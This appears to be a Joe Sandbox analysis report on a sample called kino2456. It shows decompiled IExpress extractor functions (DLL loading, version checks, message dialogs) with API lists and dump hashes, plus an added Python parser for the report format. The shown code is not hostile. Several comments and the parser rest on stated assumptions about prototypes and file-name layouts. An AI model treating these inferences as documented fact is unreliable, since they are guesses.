                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639dc
                                                                                                                                                                                                                                    0x009639b6
                                                                                                                                                                                                                                    0x00963955
                                                                                                                                                                                                                                    0x0096395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963961
                                                                                                                                                                                                                                    0x00963963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963969
                                                                                                                                                                                                                                    0x00963915
                                                                                                                                                                                                                                    0x00963915
                                                                                                                                                                                                                                    0x0096391b
                                                                                                                                                                                                                                    0x0096391f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00963723
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 009639C3
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 009639F1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                                                    • String ID: 3$doza2
                                                                                                                                                                                                                                    • API String ID: 2519184315-2054879145
                                                                                                                                                                                                                                    • Opcode ID: 69b905c7ad5a51ba2f44fd17905e2eb148f1e04b98d0e626b91efcafca78dc1e
                                                                                                                                                                                                                                    • Instruction ID: 4f1df7ecc0e1c02553c9237b47b2bdf300868cff17d90aed49dbbda6118a4f91
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69b905c7ad5a51ba2f44fd17905e2eb148f1e04b98d0e626b91efcafca78dc1e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F9103B1A152249BEB348F65CD807EA73B8EB81304F1581A9D889DB291DB748F81DF01
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 83%
E00966495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;              // stack cookie copy, checked in the epilogue
	char _v268;                  // MAX_PATH (0x104) buffer for the DLL path
	void* __edi;
	signed int _t9;
	signed char _t14;            // result of GetFileAttributesA
	struct HINSTANCE__* _t15;    // module handle returned by the loader
	void* _t18;
	CHAR* _t26;                  // "advpack.dll"
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x968004; // 0xf4cc89a0 (global security cookie)
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	// Build "<extraction directory>\advpack.dll" in the fixed-size path buffer.
	E00961781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
	_t26 = "advpack.dll";
	E0096658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	// 0xffffffff is INVALID_FILE_ATTRIBUTES (file absent), 0x10 is FILE_ATTRIBUTE_DIRECTORY.
	// If no regular advpack.dll exists in the temp directory, fall back to loading it by name
	// through the default DLL search path; otherwise load the temp-directory copy with
	// LOAD_WITH_ALTERED_SEARCH_PATH (8), so its own directory is searched first for dependencies.
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	// Epilogue: verify the stack cookie and return the module handle.
	return E00966CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}


APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 009664DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 009664F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00966502
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
• API String ID: 438848745-179718922
• Opcode ID: 83db5060ada9837cd8d84b6af5834e449bd378c204e601334dc4d570e290771e
• Instruction ID: ff25ed004963b936dc314ab24e940949c95225f7c487b01311ea0f8fd37129e0
• Opcode Fuzzy Hash: 83db5060ada9837cd8d84b6af5834e449bd378c204e601334dc4d570e290771e
• Instruction Fuzzy Hash: B001F930918108ABD760DB64DC46FEE737CDB92314F500199F586A31C0DFB09E85DB51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E009628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
	void* _v8;                   // loop index into the entry table
	char* _v12;                  // path of the file whose version info is read
	intOrPtr _v16;               // saved context pointer (__ecx)
	void* _v20;
	intOrPtr _v24;
	int _v28;                    // size of the version resource
	int _v32;                    // handle out-parameter of GetFileVersionInfoSizeA
	void* _v36;                  // locked pointer to the version buffer
	int _v40;
	void* _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	intOrPtr _v56;
	intOrPtr _v60;
	intOrPtr _v64;
	intOrPtr _t62;               // entry offset used while walking the table (added; the decompiler omitted it)
	long _t68;
	void* _t70;
	void* _t73;
	void* _t79;
	void* _t83;
	void* _t87;
	void* _t88;
	intOrPtr _t93;
	intOrPtr _t97;
	intOrPtr _t99;
	int _t101;
	void* _t103;                 // global memory handle from GlobalAlloc
	void* _t106;                 // result flag, 1 on success
	void* _t109;
	void* _t110;

	_v12 = __edx;
	_t99 = __ecx;
	_t106 = 0;
	_v16 = __ecx;
	_t87 = 0;
	_t103 = 0;
	_v20 = 0;
	// No entries to check: nothing to do, treat as success.
	if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
		L19:
		_t106 = 1;
	} else {
		_t62 = 0;
		_v8 = 0;
		while(1) {
			_v24 =  *((intOrPtr*)(_t99 + 0x80));
			// Compare the file path against the name stored in the current entry; leave on mismatch.
			if(E00962773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
				goto L20;
			}
			// Size of the file's VS_VERSIONINFO resource; 0 means the file carries no version info.
			_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
			_v28 = _t68;
			if(_t68 == 0) {
				_t99 = _v16;
				_t70 = _v8 + _t99;
				_t93 = _v24;
				_t87 = _v20;
				// No version info: the entry passes only if it requires no version (both fields zero).
				if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
					goto L18;
				}
			} else {
				// 0x42 = GMEM_MOVEABLE | GMEM_ZEROINIT; allocate and lock a buffer for the version block.
				_t103 = GlobalAlloc(0x42, _t68);
				if(_t103 != 0) {
					_t73 = GlobalLock(_t103);
					_v36 = _t73;
					if(_t73 != 0) {
                                                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00962A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00962A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                                                    			}

Decompiler address column for the function above (instruction addresses only; entries of 0x00000000 marked lines with no address): 0x009628f1, 0x009628f4, 0x009628f7, 0x009628f9, 0x009628fc, 0x009628ff, 0x00962901, 0x00962907, 0x00962a62, 0x00962a64, 0x0096290d, 0x0096290f, 0x00962912, 0x00962920, 0x00962937, 0x00962944, 0x0096294a, 0x0096294f, 0x00962a2f, 0x00962a32, 0x00962a34, 0x00962a37, 0x00962a41, 0x00962955, 0x0096295e, 0x00962962, 0x00962969, 0x0096296f, 0x00962974, 0x0096298c, 0x00962a20, 0x00962a21, 0x00962a27, 0x00962a4c, 0x00962a4f, 0x00962a50, 0x00962a53, 0x00962a56, 0x00962a5c, 0x009629b2, 0x009629b5, 0x009629bd, 0x009629c3, 0x009629cc, 0x009629d5, 0x009629d7, 0x009629da, 0x009629dd, 0x009629df, 0x009629ec, 0x009629f8, 0x009629fc, 0x009629ff, 0x00962a02, 0x00962a07, 0x00962a0a, 0x00962a0f, 0x00962a19, 0x00962a81, 0x00962a0f
                                                                                                                                                                                                                                    0x0096298c
                                                                                                                                                                                                                                    0x00962974
                                                                                                                                                                                                                                    0x00962962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096294f
                                                                                                                                                                                                                                    0x00962912
                                                                                                                                                                                                                                    0x00962a65
                                                                                                                                                                                                                                    0x00962a68
                                                                                                                                                                                                                                    0x00962a6c
                                                                                                                                                                                                                                    0x00962a6f
                                                                                                                                                                                                                                    0x00962a6f
                                                                                                                                                                                                                                    0x00962a7d

APIs
• GlobalFree.KERNEL32 ref: 00962A6F
  • Part of subcall function 00962773: CharUpperA.USER32(F4CC89A0,00000000,00000000,00000000), ref: 009627A8
  • Part of subcall function 00962773: CharNextA.USER32(0000054D), ref: 009627B5
  • Part of subcall function 00962773: CharNextA.USER32(00000000), ref: 009627BC
  • Part of subcall function 00962773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962829
  • Part of subcall function 00962773: RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962852
  • Part of subcall function 00962773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962870
  • Part of subcall function 00962773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009628A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00963938,?,?,?,?,-00000005), ref: 00962958
• GlobalLock.KERNEL32 ref: 00962969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00963938,?,?,?,?,-00000005,?), ref: 00962A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00962A81
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID:
• API String ID: 3949799724-0
• Opcode ID: 6cd39b18dc2f22725d229fd43636a9c59f92f689442432eaf4e3c248eb83a47e
• Instruction ID: 4aad5aba81047a19ff83b65dcf081cd6bbf5f4dec634accd5485a300f7176286
• Opcode Fuzzy Hash: 6cd39b18dc2f22725d229fd43636a9c59f92f689442432eaf4e3c248eb83a47e
• Instruction Fuzzy Hash: DC512831E00619EBCB21CF98C984AAEBBB9FF48700F14402AE915E3291DBB59941DF90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 32%

/* Decompiler output, cleaned up for readability. The decompiler's _push()
   sequences have been folded back into the argument lists of E009644B9
   (the same six-argument form it already shows for the allocation-failure
   path), and the variable it lost (_t3) is the resource size returned by
   the first E0096468F call, which is _t20. Per the APIs list below,
   E0096468F reads a named resource (FindResourceA/LoadResource) and
   E009644B9 shows a message box (LoadStringA + MessageBoxA); their exact
   prototypes are assumed here. */
#include <windows.h>

extern int E0096468F(const char* name, void* buf, int size);   /* assumed prototype */
extern int E009644B9(HWND owner, int string_id, const char* text,
                     void* unused, UINT mb_flags, int reserved); /* assumed prototype */

int E00964169(void* __eflags) {
	int _t20;    /* size of the FINISHMSG resource */
	void* _t21;  /* buffer receiving the message text */

	/* first call only queries the size, second call fills the buffer */
	_t20 = E0096468F("FINISHMSG", 0, 0);
	_t21 = LocalAlloc(0x40, 4 + _t20 * 4);   /* 0x40 = LPTR: fixed, zero-initialised */
	if(_t21 != 0) {
		if(E0096468F("FINISHMSG", _t21, _t20) != 0) {
			/* a FINISHMSG of "<None>" suppresses the dialog */
			if(lstrcmpA(_t21, "<None>") != 0) {
				/* string 0x3e9 with the message text, 0x40 = MB_ICONINFORMATION */
				E009644B9(0, 0x3e9, _t21, 0, 0x40, 0);
			}
		} else {
			/* resource could not be read: error string 0x4b1, 0x10 = MB_ICONERROR */
			E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
		}
		return (int)(INT_PTR)LocalFree(_t21);
	}
	/* allocation failed: error string 0x4b5, 0x10 = MB_ICONERROR */
	return E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
}

APIs
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
  • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
  • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
  • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
  • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
  • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009630B4), ref: 00964189
• LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009630B4), ref: 009641E7
  • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
  • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: bfbb7c0fa485b3fffca26bf46b2eb8785481d3942e9ddcb47abbd212f2f49606
                                                                                                                                                                                                                                    • Instruction ID: 0cac4f89ec09e4087fc9bb3394f322e1ceae1ce115668e54bbb00311b011db91
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfbb7c0fa485b3fffca26bf46b2eb8785481d3942e9ddcb47abbd212f2f49606
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B001F4F13082147FF32426A58C86F7B218EDBE67D9F06403AB706E1290DEA8CC015175
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 93%
			// Dialog procedure (DLGPROC) of a small message-box style dialog:
			// _a4 = hDlg, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
			// The trailing "// 0x..." comment on each statement is the instruction address
			// the decompiler mapped to it (the report's address column, folded in here).
			E009619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;              // frame copy of the stack cookie
				char _v520;                  // 0x200-byte text buffer filled by LoadStringA
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;             // esp at entry (decompiler register variable)

				_t33 = __edi;                                         // 0x009619e0
				_t27 = __ebx;                                         // 0x009619e0
				// Classic MSVC /GS prologue: the global __security_cookie lives at 0x968004,
				// inside the PAGE_READWRITE image region dumped at 0x968000; XORed with esp
				// it becomes the per-frame cookie checked again before returning.
				_t11 =  *0x968004; // 0xf4cc89a0                       // 0x009619eb
				_v8 = _t11 ^ _t35;                                    // 0x009619f2
				_t34 = _a4;                                           // 0x009619f9  hDlg
				_t14 = _a8 - 0x110;                                   // 0x009619fc  uMsg - WM_INITDIALOG
				if(_t14 == 0) {                                       // 0x00961a01  WM_INITDIALOG (0x110)
					_t32 = GetDesktopWindow();                        // 0x00961a2a
					E009643D0(_t34, _t15);                            // 0x00961a2e  _t15 is most likely eax after GetDesktopWindow (decompiler naming); E009643D0 probably centers the dialog on it
					_v520 = 0;                                        // 0x00961a3e
					// lParam (_a16) carries the string-resource ID to display; *0x969a3c holds the module HINSTANCE.
					LoadStringA( *0x969a3c, _a16,  &_v520, 0x200);    // 0x00961a4f
					SetDlgItemTextA(_t34, 0x83f,  &_v520);            // 0x00961a62  control 0x83f shows the loaded text
					MessageBeep(0xffffffff);                          // 0x00961a6a  MessageBeep(-1): simple beep
					goto L6;                                          // 0x00000000
				} else {                                              // 0x00961a03
					if(_t14 != 1) {                                   // 0x00961a06  anything but WM_COMMAND (0x111)
						L4:                                           // 0x00961a20
						_t23 = 0;                                     // 0x00961a20  FALSE: message not handled
					} else {                                          // 0x00961a08
						_t32 = _a12;                                  // 0x00961a08  wParam = control ID of the clicked button
						if(_t32 - 0x83d > 1) {                        // 0x00961a14  unsigned compare: only IDs 0x83d and 0x83e close the dialog
							goto L4;                                  // 0x00000000
						} else {                                      // 0x00961a16
							EndDialog(_t34, _t32);                    // 0x00961a18  dialog result = the pressed control ID
							L6:                                       // 0x00961a70
							_t23 = 1;                                 // 0x00961a72  TRUE: handled
						}                                             // 0x00961a72
					}                                                 // 0x00961a14
				}                                                     // 0x00961a06
				// /GS epilogue: E00966CE0 re-derives _v8 ^ esp, compares it with the cookie and returns _t23.
				return E00966CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);   // 0x00961a81
			}

APIs
• EndDialog.USER32(?,?), ref: 00961A18
• GetDesktopWindow.USER32 ref: 00961A24
• LoadStringA.USER32(?,?,00000200), ref: 00961A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00961A62
• MessageBeep.USER32(000000FF), ref: 00961A6A
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: c6bd8298a3e6610721568355a0197d7941ad167c088f589d86ec73c0c21b7b65
• Instruction ID: fcb32751d1c91c9d5a75bc3aab115ca559a9c62ac1ba19348b536a87403e6b2a
• Opcode Fuzzy Hash: c6bd8298a3e6610721568355a0197d7941ad167c088f589d86ec73c0c21b7b65
• Instruction Fuzzy Hash: 9211A131519119AFDB10EFA4DE08AAE77B8FF4A300F148158F912E2190DE74AE01EB95
Uniqueness

Uniqueness Score: -1.00%
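The two pieces of each function entry a triager actually pivots on are the "APIs" bullets (call site address, API, module, observed arguments, and whether the call sits in a subcall) and the .sdmp names under "Memory Dump Source". The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses both formats for this function and attributes every call site to the dump region containing it. The PAGE_* and MEM_* values are Windows' own winnt.h constants; the field layout of the .sdmp name (pid.stage.dumpid.base.protect.state.type.index) is inferred from the names on this page and is an assumption, as is assigning an address to the dump with the highest base not above it, since the names carry no region size. The sample input is copied from the report lines above.

```python
"""Decode the API-reference bullets and memory-dump (.sdmp) names of a Joe Sandbox
function entry, and attribute each call site to the dump region that contains it."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows memory constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# "• [Part of subcall function X: ]Api.MODULE[(arg,arg,...)], ref: ADDR"
API_RE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"        # e.g. LoadStringA.USER32
    r"(?:\((?P<args>[^)]*)\))?,?\s*"        # optional argument list
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)"         # call-site address
)
# ASSUMPTION (inferred from the names on this page, not documented by the report):
# pid.stage.dumpid.base.protect.state.type.index.sdmp, every field but dumpid in hex.
DUMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]
    ref: int                 # call-site address
    caller: Optional[int]    # set when the bullet reads "Part of subcall function X"


@dataclass
class DumpRegion:
    pid: int
    base: int
    protect: str
    mem_type: str
    name: str


def parse_api_ref(line: str) -> Optional[ApiRef]:
    m = API_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiRef(m["api"], m["module"], args, int(m["ref"], 16), caller)


def parse_dump_name(name: str) -> Optional[DumpRegion]:
    m = DUMP_RE.search(name)     # tolerates fused suffixes such as "...sdmpDownload File"
    if not m:
        return None
    prot, typ = int(m["protect"], 16), int(m["type"], 16)
    return DumpRegion(int(m["pid"], 16), int(m["base"], 16),
                      PAGE_PROTECT.get(prot & 0xFF, f"0x{prot:x}"),   # mask PAGE_GUARD etc.
                      MEM_TYPE.get(typ, f"0x{typ:x}"), m.group(0))


def region_for(addr: int, regions: List[DumpRegion]) -> Optional[DumpRegion]:
    """ASSUMPTION: dump names carry no size, so pick the region with the highest base <= addr."""
    below = [r for r in regions if r.base <= addr]
    return max(below, key=lambda r: r.base) if below else None


def attribute_calls(api_lines: List[str], dump_names: List[str]) -> List[Tuple[ApiRef, Optional[DumpRegion]]]:
    regions = [d for d in (parse_dump_name(n) for n in dump_names) if d]
    refs = [r for r in (parse_api_ref(l) for l in api_lines) if r]
    return [(r, region_for(r.ref, regions)) for r in refs]


# Sample input copied from the report entries above.
REPORT_API_LINES = [
    "• EndDialog.USER32(?,?), ref: 00961A18",
    "• GetDesktopWindow.USER32 ref: 00961A24",
    "• LoadStringA.USER32(?,?,00000200), ref: 00961A4F",
    "• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00961A62",
    "• MessageBeep.USER32(000000FF), ref: 00961A6A",
    "• Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554",
]
REPORT_DUMPS = [
    "00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp",
    "00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp",
    "00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp",
    "00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp",
    "00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp",
]

if __name__ == "__main__":
    for ref, reg in attribute_calls(REPORT_API_LINES, REPORT_DUMPS):
        where = f"{reg.protect} region @0x{reg.base:X}" if reg else "unknown region"
        via = f" (via sub_{ref.caller:X})" if ref.caller else ""
        print(f"0x{ref.ref:X} {ref.api}.{ref.module}({', '.join(ref.args)}){via} -> {where}")
```

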